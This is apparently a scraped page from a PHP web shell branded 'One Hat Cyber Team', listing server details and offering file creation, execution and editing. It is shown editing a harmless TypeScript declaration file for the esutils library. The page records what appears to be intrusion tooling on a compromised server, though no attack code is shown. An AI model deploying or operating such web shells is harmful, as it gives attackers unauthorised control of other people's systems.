⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
nodejs
/
@types
/
esutils
/
Edit File: index.d.ts
// Type definitions for esutils 2.0 // Project: https://github.com/estools/esutils // Definitions by: Rhythm Bhiwani <https://github.com/rhythmbhiwani> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped export = esutils; declare const esutils: { ast: { isExpression: (node: any) => boolean; isIterationStatement: (node: any) => boolean; isProblematicIfStatement: (node: any) => boolean; isSourceElement: (node: any) => boolean; isStatement: (node: any) => boolean; trailingStatement: any; }; code: { isDecimalDigit: (ch: any) => boolean; isHexDigit: (ch: any) => boolean; isIdentifierPartES5: (ch: any) => boolean; isIdentifierPartES6: (ch: any) => boolean; isIdentifierStartES5: (ch: any) => boolean; isIdentifierStartES6: (ch: any) => boolean; isLineTerminator: (ch: any) => boolean; isOctalDigit: (ch: any) => boolean; isWhiteSpace: (ch: any) => boolean; }; keyword: { isStrictModeReservedWordES6: (id: any) => boolean; isIdentifierES5: (id: any, strict: any) => boolean; isIdentifierES6: (id: any, strict: any) => boolean; isIdentifierNameES5: (id: any) => boolean; isIdentifierNameES6: (id: any) => boolean; isKeywordES5: (id: any, strict: any) => boolean; isKeywordES6: (id: any, strict: any) => boolean; decodeUtf16: (lead: any, trail: any) => any; isReservedWordES5: (id: any, strict: any) => boolean; isReservedWordES6: (id: any, strict: any) => boolean; isRestrictedWord: (id: any) => boolean; }; };
Simpan